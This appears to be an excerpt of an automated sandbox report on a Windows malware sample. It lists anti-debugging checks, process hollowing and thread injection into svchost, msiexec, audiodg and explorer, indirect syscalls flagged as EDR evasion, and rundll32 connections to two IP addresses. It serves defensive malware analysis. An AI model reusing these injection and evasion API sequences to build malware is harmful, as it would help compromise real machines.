Source: C:\Windows\System32\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Process queried: DebugPort
Source: C:\Windows\System32\svchost.exe	Process queried: DebugPort
Source: C:\Windows\System32\audiodg.exe	Process queried: DebugPort
Source: C:\Windows\System32\msiexec.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Process queried: DebugPort
Source: C:\Windows\System32\svchost.exe	Process queried: DebugPort
Source: C:\Windows\System32\audiodg.exe	Process queried: DebugPort
Source: C:\Windows\System32\msiexec.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

Code function: 0_2_00007FF79E38321C IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,

0_2_00007FF79E38321C

Source: C:\Windows\explorer.exe

Code function: 4_2_09847A24 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

4_2_09847A24

Source: C:\Windows\explorer.exe

Code function: 4_2_098288B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,

4_2_098288B0

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

Code function: 0_2_00007FF79E381050 LoadLibraryA,GetProcAddress,

0_2_00007FF79E381050

Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006BE250 mov eax, dword ptr fs:[00000030h]	18_2_006BE250
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006C66E2 mov eax, dword ptr fs:[00000030h]	18_2_006C66E2
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007CE250 mov eax, dword ptr fs:[00000030h]	19_2_007CE250
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007D66E2 mov eax, dword ptr fs:[00000030h]	19_2_007D66E2
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007CE250 mov eax, dword ptr fs:[00000030h]	20_2_007CE250
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007D66E2 mov eax, dword ptr fs:[00000030h]	20_2_007D66E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 29_2_6971B881 mov eax, dword ptr fs:[00000030h]	29_2_6971B881
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 29_2_6971A254 mov eax, dword ptr fs:[00000030h]	29_2_6971A254

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

0_2_00007FF79E381CDC

Source: C:\Windows\System32\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\explorer.exe	Code function: 4_2_09850350 SetUnhandledExceptionFilter,	4_2_09850350
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF69001BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF69001BBC0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF69001C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF69001C44C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF69001C62C SetUnhandledExceptionFilter,	11_2_00007FF69001C62C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690029924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF690029924
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF69001BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FF69001BBC0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF69001C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FF69001C44C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF69001C62C SetUnhandledExceptionFilter,	16_2_00007FF69001C62C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690029924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FF690029924
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8370F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FF8B8370F20
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B834A184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FF8B834A184
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB65054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FF8BFB65054
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB64A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FF8BFB64A34
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB76810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FF8BFB76810
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB75DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FF8BFB75DF8
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB769F8 SetUnhandledExceptionFilter,	16_2_00007FF8BFB769F8
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB9D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FF8BFB9D414
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006BA895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_006BA895
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006BA9F8 SetUnhandledExceptionFilter,	18_2_006BA9F8
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006BF25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_006BF25D
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006B9FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_006B9FA8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007CF25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_007CF25D
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007CA895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_007CA895
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007CA9F8 SetUnhandledExceptionFilter,	19_2_007CA9F8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007C9FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_007C9FA8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007CA895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_007CA895
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007CA9F8 SetUnhandledExceptionFilter,	20_2_007CA9F8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007CF25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_007CF25D
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007C9FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_007C9FA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 29_2_69719820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_69719820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 29_2_69716B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_69716B1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 29_2_69717288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_69717288

Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: CC11.tmp.ctx.exe.4.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.81.68.147 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.81.68.148 80

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

Code function: 0_2_00007FF79E382048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,

0_2_00007FF79E382048

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Code function: 0_2_00007FF79E382CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	0_2_00007FF79E382CB8
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_00007FF7E52B2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	1_2_00007FF7E52B2CB8
Source: C:\Windows\explorer.exe	Code function: 4_2_09823100 OpenProcess,GetModuleHandleA,GetProcAddress,CloseHandle,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle,	4_2_09823100
Source: C:\Windows\explorer.exe	Code function: 4_2_09824200 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	4_2_09824200
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Code function: 6_2_00007FF6743D2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	6_2_00007FF6743D2CB8
Source: C:\Windows\System32\audiodg.exe	Code function: 8_2_00007FF7A91B2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	8_2_00007FF7A91B2CB8
Source: C:\Windows\System32\msiexec.exe	Code function: 9_2_00007FF7179D2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	9_2_00007FF7179D2CB8

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\svchost.exe

Thread created: C:\Windows\explorer.exe EIP: 333AA10

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	NtUnmapViewOfSection: Indirect: 0x7FF79E3823DC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	NtUnmapViewOfSection: Indirect: 0x7FF6743D23DC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	NtUnmapViewOfSection: Indirect: 0x7FF64D7723DC
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	NtUnmapViewOfSection: Indirect: 0x7FF7F75423DC

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\explorer.exe base: 3320000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\svchost.exe

Memory written: PID: 1028 base: 3320000 value: 4D

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Thread register set: target process: 2888	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Thread register set: target process: 4204	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Thread register set: target process: 2656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Thread register set: target process: 5576	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Thread register set: target process: 2228	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Thread register set: target process: 5304	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Thread register set: target process: 6572	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Thread register set: target process: 6596	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Thread register set: target process: 5840	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Thread register set: target process: 5596
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Thread register set: target process: 6616
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Thread register set: target process: 5608
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Thread register set: target process: 3228
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Thread register set: target process: 5012
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Thread register set: target process: 6632

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7179D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7179D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7179D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7179D0000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7179D0000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C0FA27010	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\audiodg.exe base: 656849B010	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D1000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D5000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D7000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D8000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D9000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179DA000	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Memory written: C:\Windows\System32\msiexec.exe base: 6416BE010	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\explorer.exe base: 3320000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 2B593CE010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D1000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D5000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D7000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D8000	Jump to behavior
